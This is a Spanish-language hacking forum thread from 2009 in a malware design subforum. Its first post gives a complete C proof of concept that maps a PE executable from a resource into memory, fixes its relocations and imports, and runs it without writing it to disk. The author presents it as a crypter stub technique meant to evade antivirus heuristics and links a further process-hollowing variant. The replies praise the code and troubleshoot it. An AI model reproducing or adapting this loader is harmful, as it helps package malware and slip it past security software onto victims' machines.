elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Usas Skype? Protégete de los Skype Resolver


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Ejecución de Archivos desde Memoria [Base Relocation]
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: Ejecución de Archivos desde Memoria [Base Relocation]  (Leído 15,891 veces)
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Ejecución de Archivos desde Memoria [Base Relocation]
« en: 18 Agosto 2009, 19:32 »

Ejecución de Archivos desde Memoria - Base Relocation

Bueno, hago éste texto para explicar un poco en que consiste el método y a la vez para que no haya gente que se limite a copiar el código sin más. Todo lo que voy a decir está basado en lo siguiente, el cual será necesario leer antes de éste texto para comprender bien el código.

Código:
http://www.joachim-bauch.de/tutorials/load_dll_memory.html

A la vez, para comprender todo lo que diré, será necesario tener conocimientos sobre el formato PE, y el único texto que encontré que habla un poco de la Base Relocation es el de microsoft:

Código:
http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/pecoff_v8.docx


El Problema

Vale, imaginémonos que estamos programando un crypter. El stub del crypter, al ser ejecutado, descifra el archivo en memoria, y llegamos al momento, en que tenemos el archivo que habíamos cifrado, descifrado y mapeado en memoria, pero no podemos ejecutarlo, puesto no está cargado en su ImageBase, y por lo tanto, todas las instrucciones relativas al ImageBase saltarán a un punto que vete tu a saber que hay. Entre éstas instrucciónes, están las llamadas a las API's (llamadas a punteros de la IAT), y al haberse mapeado y no cargado, la IAT no se cargó con las direcciones de las API's, otro problema  :-\.

El Loader de Windows

Para entender lo que vamos a hacer, vamos a ver antes que es lo que hace windows para ejecutar un archivo cuando nosotros se lo indicamos:
  • Lee el archivo y busca la cabecera DOS, la cabecera PE y las cabeceras de las secciones.
  • Intenta reservar espacio en memoria en la dirección del ImageBase, y si ya está en uso, la reserva en otra dirección. La cantidad de memoria que reserva está marcado por el SizeOfImage.
  • Mapea las distintas secciones de acuerdo con su VirtualOffset y VirtualSize y los Flags.
  • Si el archivo no está cargado en su ImageBase, hace una reubicación de la base del ejecutable.
  • Recorre la Import Table y carga las librerías que importa en ejecutable.
  • Rellena la IAT con las direcciones de las funciones que importa.
  • Crea el hilo inicial de ejecución y lanza el proceso.

La Solución

Si emulamos el Loader de Windows a base de código, podemos arrancar el ejecutable desde memoria sin necesidad de guardarlo en disco y ejecutarlo o tener que crear otro proceso para tener el ImageBase origianal libre.

Aquí pongo el código que hice, y subo el proyecto. El archivo lleva en el resource un ejecutable que emite un messagebox. Al arrancar el archivo, la sección de resource se mapea en memoria con todo el ejecutable, y emulando el loader de windows, carga el archivo reubicando la ImageBase y pasandole la ejecución a éste  ;-). Comenté mucho el código para que no haya problemas de comprensión, pero es necesario tener muy claro el formato PE  :P.

Código
  1. //-------------------------------------------------------------------------------------------
  2. // PoC - [Base Relocation]
  3. //
  4. //Descripción: Ejecuta un archivo mapeado en memoria sin guardarlo en disco
  5. //Autor: Hacker_Zero
  6. //Fecha: 18-8-2009
  7. //Basado en: http://www.joachim-bauch.de/tutorials/load_dll_memory.html
  8. //-------------------------------------------------------------------------------------------
  9.  
  10. #pragma optimize("gsy", on)
  11. #pragma comment(linker, "/ENTRY:main")
  12.  
  13. #include <windows.h>
  14. #include "resource.h"
  15.  
  16. void main()
  17. {
  18. //Cargamos ejecutable del resource
  19. HRSRC hResource=FindResourceA(NULL,(LPCSTR)MAKEINTRESOURCE(IDR_EXE1),"EXE");
  20. HGLOBAL hGlob=LoadResource(NULL,hResource);
  21. DWORD FileSize=SizeofResource(NULL,hResource);
  22. LPSTR lpFileMaped=(LPSTR)LockResource(hGlob);
  23.  
  24. PIMAGE_DOS_HEADER IDH;
  25. PIMAGE_NT_HEADERS INTH;
  26. PIMAGE_SECTION_HEADER ISH;
  27.  
  28. //Obtenemos la cabecera DOS y PE en las estructuras
  29. IDH=(PIMAGE_DOS_HEADER)&lpFileMaped[0];
  30. INTH=(PIMAGE_NT_HEADERS)&lpFileMaped[IDH->e_lfanew];
  31.  
  32. //Creamos el buffer del tamaño del SizeOfImage en el que cargaremos el ejecutable
  33. LPSTR ExeBuffer=(LPSTR)VirtualAlloc(NULL,INTH->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
  34. //LPSTR ExeBuffer=(LPSTR)GlobalAlloc(GPTR,INTH->OptionalHeader.SizeOfImage);
  35.  
  36. //Copiamos la cabecera DOS y PE al buffer
  37. CopyMemory(&ExeBuffer[0],&lpFileMaped[0],INTH->OptionalHeader.SizeOfHeaders);
  38.  
  39. //Copiamos las secciones en su VirtualOffset en el buffer
  40. for(DWORD i=0;i<INTH->FileHeader.NumberOfSections;i++)
  41. {
  42. ISH=(PIMAGE_SECTION_HEADER)&lpFileMaped[IDH->e_lfanew+sizeof(IMAGE_NT_HEADERS)+sizeof(IMAGE_SECTION_HEADER)*i];
  43. CopyMemory(&ExeBuffer[ISH->VirtualAddress],&lpFileMaped[ISH->PointerToRawData],ISH->SizeOfRawData);
  44. }
  45.  
  46. //Calculamos el delta entre la dirección del buffer y el ImageBase
  47. DWORD Delta=(((DWORD)ExeBuffer)-INTH->OptionalHeader.ImageBase);
  48.  
  49. //------------------------------------------------------------
  50. /* -Reubicamos la dirección base del ejecutable :D- */
  51. //------------------------------------------------------------
  52.  
  53. //Si no hay tabla de reubicación, salimos
  54. if(INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size==0)
  55. {
  56. MessageBoxA(0,"No se ha encontrado Tabla de Reubicaciones\nImposible cargar el archivo",0,0);
  57. ExitProcess(0);
  58. }
  59.  
  60. //Obteemos el Image Base Relocation
  61. PIMAGE_BASE_RELOCATION IBR=(PIMAGE_BASE_RELOCATION)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
  62.  
  63. //Vamos recorriendo todas las etradas del bloque
  64. for (;IBR->VirtualAddress>0; )
  65. {
  66. //Obtenemos el Bloque de reubicación
  67. LPSTR RelocationBlock=(LPSTR)(ExeBuffer+IBR->VirtualAddress);
  68.  
  69. //Obtenemos la primera entrada del bloque
  70. LPWORD RelocationEntry=(LPWORD)((LPSTR)IBR+sizeof(IMAGE_BASE_RELOCATION));
  71.  
  72. //Recorremos todas las entradas del bloque
  73. for (DWORD i=0;i<((IBR->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))/2);i++,RelocationEntry++)
  74. {
  75. //Obtenemos los 4 bits que definen el tipo de reubicación
  76. DWORD type=*RelocationEntry>>12;
  77.  
  78. //Obtenemos los 12 bits que definen la dirección de la reubicación
  79. DWORD offset=*RelocationEntry&0xfff;
  80.  
  81. //Si el tipo de reubicación es relativo a la dirección base, añadimso el delta
  82. switch (type)
  83. {
  84. case IMAGE_REL_BASED_HIGHLOW:
  85. //Añadimos a la dirección que depende del imagebase original
  86. //el delta entre el imagebase y nuestra dirección base
  87. LPDWORD newAddr=(LPDWORD)(RelocationBlock+offset);
  88. *newAddr=Delta+(DWORD)*newAddr;
  89. break;
  90. }
  91. }
  92. //Vamos al siguiente bloque
  93. IBR = (PIMAGE_BASE_RELOCATION)(((DWORD)IBR) + IBR->SizeOfBlock);
  94. }
  95.  
  96.  
  97. //---------------------------------------------------------------------
  98. /* -Cargamos los valores de la IAT para poder llamar a las apis- */
  99. //---------------------------------------------------------------------
  100.  
  101. PIMAGE_THUNK_DATA ITD;
  102. PIMAGE_IMPORT_BY_NAME IIBN;
  103.  
  104. //Comprobamos si hay Import Data Descriptor
  105. if (INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size>0)
  106. {
  107. //Si lo hay lo obtenemos en la estructura
  108. PIMAGE_IMPORT_DESCRIPTOR IID=(PIMAGE_IMPORT_DESCRIPTOR)(ExeBuffer+INTH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
  109.  
  110. //Vamos recorriendo todas las Dll's importadas por el ejecutable
  111. for (;IID->Name;IID++)
  112. {
  113. //Cargamos la dll
  114. HMODULE hLib=LoadLibraryA((LPCSTR)(ExeBuffer+IID->Name));
  115.  
  116. //Obtenemos la dirección al primer miembro del array Image Thunk Data's
  117. ITD=(PIMAGE_THUNK_DATA)((DWORD)ExeBuffer+IID->FirstThunk);
  118.  
  119. //Vamos recorriendo las funciones importadas
  120. for (;ITD->u1.Ordinal;ITD++)
  121. {
  122. //Cargamos el Image Import By Name para obtener el nombre
  123. IIBN=(PIMAGE_IMPORT_BY_NAME)(ExeBuffer+ITD->u1.Function);
  124. //Obtenemos la dirección de la función y la guardamos en la IAT
  125. ITD->u1.Function=(DWORD)GetProcAddress(hLib,(LPCSTR)&IIBN->Name);
  126. }
  127. }
  128. }
  129.  
  130. //Obteemos el EntryPoint de ejecutable que cargamos en el buffer
  131. DWORD EntryPoint=((DWORD)ExeBuffer)+INTH->OptionalHeader.AddressOfEntryPoint;
  132.  
  133. //Llamamos al EntryPoint
  134. __asm
  135. {
  136. mov eax,EntryPoint
  137. call eax
  138. }
  139.  
  140. ExitProcess(0);
  141. }
  142.  


# Cabe destacar que para que el archivo pueda ser ejecutado en un ImageBase distinto al original, es necesario que el archivo tenga tabla de reubicación, el VC++ 2008 la pone en los ejecutables por defecto, y en Fasm se puede añadir con la siguiente línea:

Código:
section '.reloc' fixups data discardable

En VB no se si se pude poner, al menos no lo hace por defecto  :P.



# Los antivirus suelen Hookear las API's de manejo de memoria en un proceso remoto, por eso, la mayoría de crypters que usan API's como WriteProcessMemory o CreateRemoteThread son detectados por las heurísticas. Con éste método se evita tener que llamar a esas API's, por lo que (no lo probé) debería de poder saltarse las heurísticas  ;-).



# Pronto actualizaré el post con un código que solucionará el problema de que el archivo deba tener tabla de reubicaciones  ;D.


Descargar proyecto de ejemplo





Ejecutar archivos sin Relocation Table

Bueno, pues terminé el código que ejecuta archivos desde memoria aunque éstos no tengan Relocation Table. Tiene un pequeño fallo, y es que con ejecutables en VB crashea debido a que hay algo raro en el import table, no sé muy bien aún a que se debe pero se puede solucionar.

Lo que hace el código es ejecutar un Loader que tiene Relocation Table desde una posición de memoria diferente a su ImageBase. El loader ejecuta el archivo que queremos inyectar desde memoria librerando memoria en el ImageBase original (00400000, desde donde habíamos llamado al loader) y carga ahí el ejecutable, por lo que no es necesario reubicar la ImageBase y funciona  ;D.


Descargar Código Fuente

Saludos


« Última modificación: 19 Agosto 2009, 11:37 por Hacker_Zero » En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Karcrack


Desconectado Desconectado

Mensajes: 2.425


Se siente observado ¬¬'


Ver Perfil
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #1 en: 18 Agosto 2009, 19:38 »

Muy bueno ;D ;D ;D

Lastima que haga falta lo del .reloc :( Sino harias un crypter fenomenal :xD

Le pongo una chincheta... ya estara bien de hacer tutos... como hagas uno solo mas me va a tocar hacerte un recopilatorio para ti solo :¬¬ :xD, nah, es broma, sigue asi ;)
En línea

[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #2 en: 18 Agosto 2009, 19:42 »

Lo de reloc está solucionado virtualmente, falta el código jeje. Pronto actualizo con el código que soluciona ese problema y a ver si hago un crypter de muestra (el builder ya lo tengo de una vez asíque...  :xD).

Saludos y gracias por la chincheta  :xD

Edito: Bueno, lo intenté con ésto, pero al parecer no fue buena idea, pensaré en otra cosa  :-\.
« Última modificación: 20 Agosto 2009, 00:47 por Hacker_Zero » En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Jaixon Jax


Desconectado Desconectado

Mensajes: 859



Ver Perfil
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #3 en: 19 Agosto 2009, 05:38 »

 :o

  Valla pedazo de aportacion jeje




  Descargando.........  :xD
En línea

[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #4 en: 19 Agosto 2009, 11:36 »

Actualicé el post, ahora ejecuta cualquier archivo tenga o no Relocation Table (salvo ejecutables en VB  :¬¬).

Saludos
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Distorsion

Desconectado Desconectado

Mensajes: 238


15Hz ~ 20Hz


Ver Perfil
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #5 en: 21 Agosto 2009, 11:37 »

Muy bueno  ;D Gracias a vosotros esto esta cogiendo nivel.

Saludos.
En línea

prat

Desconectado Desconectado

Mensajes: 54


PrAt


Ver Perfil
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #6 en: 22 Octubre 2009, 10:32 »

Ooops, mi sexto sentido me dice que esto me interesa.... aunque tendre que leermelo 7 u 8 veces y alguna mas  :xD

Gracias por la aportacion! ^^
En línea

Nota mental: Crearme una firma. >.<
plaganegra

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #7 en: 12 Diciembre 2009, 19:13 »

 ;-) Muy bueno el articulo, de veras. Felicitaciones.
Estoy teniendo un pequeño problema al intentar saltar a la direccion en memoria con

Código:
_asm
{
     mov eax, AddEntryPoint
     call eax
}
o similarmente también:
Código:
_asm
{
     mov eax, AddEntryPoint
     push eax
     ret
}
Me salta Violación de Acceso (0x0000005 Error), porqué?
Que pena si es un poco tarde para preguntar pero no he podido resolver el problemilla
« Última modificación: 12 Diciembre 2009, 19:24 por plaganegra » En línea

[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.082


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #8 en: 13 Diciembre 2009, 00:33 »

;-) Muy bueno el articulo, de veras. Felicitaciones.
Estoy teniendo un pequeño problema al intentar saltar a la direccion en memoria con

Código:
_asm
{
     mov eax, AddEntryPoint
     call eax
}
o similarmente también:
Código:
o
_asm
{
     mov eax, AddEntryPoint
     push eax
     ret
}
Me salta Violación de Acceso (0x0000005 Error), porqué?
Que pena si es un poco tarde para preguntar pero no he podido resolver el problemilla

Hm es raro, como lo estás probando? Quizás no tenga permisos de ejecución a donde estás saltando o no obtienes bien el EntryPoint. Intenta debugear y mira a ver que es lo que pasa. Yo tuve problemas en el segundo ejemplo que inyecta sin relocation table, necesité darle permisos de debug para que funcionara, estás probando el primero o el segundo ejemplo?

Saludos  :)
« Última modificación: 13 Diciembre 2009, 00:37 por Hacker_Zero » En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
plaganegra

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Ejecución de Archivos desde Memoria [Base Relocation]
« Respuesta #9 en: 13 Diciembre 2009, 05:36 »

Estoy viendo con el debbuger y el problema es precisamente eso, no hay permisos, aunque realmente la memoria se esta reservando en el mismo espacio de proceso y estoy obteniendo los permisos "SeDebugPrivilege", "SeCreatePagefilePrivilege", "SeTcbPrivilege"; mediante el uso de OpenProcessToken, LookupPrivilegeValue y AdjustTokenPrivileges. :-\

Con respecto al entrypoint lo revise con el PEditor 1.7 y efectivamente si es el entry point correcto.

También escaneo la memoria en la direccion retornada por VirtualAlloc y efectivamente se encuentra el MZ y PE después de haber escrito esa parte en la memoria. :huh:

No se que puede ser, que consejos me puedas dar, alguna experiencia similar? :-\

Saludos  ;D
En línea

Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines